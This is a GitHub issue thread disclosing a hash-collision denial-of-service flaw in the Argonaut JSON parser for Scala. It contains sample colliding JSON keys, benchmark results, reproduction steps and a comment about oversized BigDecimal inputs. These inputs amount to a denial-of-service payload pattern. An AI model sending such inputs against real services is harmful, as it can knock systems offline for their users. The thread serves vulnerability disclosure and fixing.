Denial of service when parsing JSON object with keys that have the same hash code
Sub-quadratic decreasing of throughput when number of JSON object fields (with keys that have the same hash code) is increasing
On contemporary CPUs parsing of such JSON object (with a sequence of 100000 fields like below that is ~1.6Mb) can took more than 100 seconds:
{
"!!sjyehe":null,
"!!sjyeiF":null,
"!!sjyej'":null,
"!!sjyfIe":null,
"!!sjyfJF":null,
...
}
Below are results of the benchmark where size is a number of such fields:
[info] REMEMBER: The numbers below are just data. To gain reusable insights, you need to follow up on
[info] why the numbers are the way they are. Use profilers (see -prof, -lprof), design factorial
[info] experiments, perform baseline and negative tests that provide experimental control, make sure
[info] the benchmarking environment is safe on JVM/OS/HW level, ask for reviews from the domain experts.
[info] Do not assume the numbers tell you what you want them to tell.
[info] Benchmark (size) (value) Mode Cnt Score Error Units
[info] ExtractFieldsBenchmark.readArgonaut 1 null thrpt 5 969947.719 ± 47977.521 ops/s
[info] ExtractFieldsBenchmark.readArgonaut 10 null thrpt 5 220650.585 ± 27891.347 ops/s
[info] ExtractFieldsBenchmark.readArgonaut 100 null thrpt 5 7580.773 ± 1298.528 ops/s
[info] ExtractFieldsBenchmark.readArgonaut 1000 null thrpt 5 71.919 ± 7.111 ops/s
[info] ExtractFieldsBenchmark.readArgonaut 10000 null thrpt 5 0.444 ± 0.089 ops/s
[info] ExtractFieldsBenchmark.readArgonaut 100000 null thrpt 5 0.010 ± 0.002 ops/s
Reproducible Test Case
To run that benchmarks on your JDK:
- Install latest version of
sbtand/or ensure that it already installed properly:
sbt about
- Clone
jsoniter-scalarepo:
git clone https://github.com/plokhotnyuk/jsoniter-scala.git
- Enter to the cloned directory and checkout for the specific branch:
cd jsoniter-scala
git checkout argonaut-DoS-by-hashmap-collisions
- Run benchmarks using a path parameter to your JDK:
sbt -no-colors 'jsoniter-scala-benchmark/jmh:run -jvm /usr/lib/jvm/jdk-11/bin/java -wi 3 -i 5 .*ExtractFieldsBench.*Argonaut.*'
@plokhotnyuk - I wasn't able to reproduce it in:
$amm
Loading...
Welcome to the Ammonite Repl 1.0.3
(Scala 2.12.4 Java 1.8.0_121)
If you like Ammonite, please support our development at www.patreon.com/lihaoyi
@ import $ivy.`io.argonaut::argonaut:6.2.2`
import $ivy.$
@ import argonaut._, Argonaut._
import argonaut._, Argonaut._
@ case class Foo(num: BigDecimal)
defined class Foo
@ val str = """{ "num" : 1e1000000000}"""
str: String = "{ \"num\" : 1e1000000000}"
@ val json = str.parse
json: Either[String, Json] = Right(JObject(JsonObjectInstance(Map("num" -> JNumber(JsonDecimal("1e1000000000"))), Vector("num"))))
@ val jsonUnsafe = json.right.get
jsonUnsafe: Json = JObject(JsonObjectInstance(Map("num" -> JNumber(JsonDecimal("1e1000000000"))), Vector("num")))
@ DecodeJson.derive[Foo].decodeJson(jsonUnsafe)
res14: DecodeResult[Foo] = DecodeResult(Right(Foo(1E+1000000000)))
Could you please tell me how to, perhaps, modify my example to reproduce the error that you raised in this issue?
@kevinmeredith It is a case about collisions in a hash map that is used for internal representation of JSON object like here: https://github.com/playframework/play-json/issues/186 https://github.com/spray/spray-json/issues/277 https://github.com/json4s/json4s/issues/553
Please start from reproducible steps that are in description of the issue, then look in to the benchmark code to see how that messages were build or just add a printing statement to see how them look like.
But, the case that was mentioned by you is also unsafe for users of the parsed message... Just try to pass the parsed value of that big decimal number to the following function and see what will happen:
scala> val f = (x: BigDecimal) => x + 1
f: BigDecimal => scala.math.BigDecimal = $$Lambda$1210/93981118@790ac3e0
👋 Hey folks! We've recently opened a bug bounty against this issue, so if you want to get rewarded 💰 for fixing this vulnerability 🕷, head over to https://huntr.dev!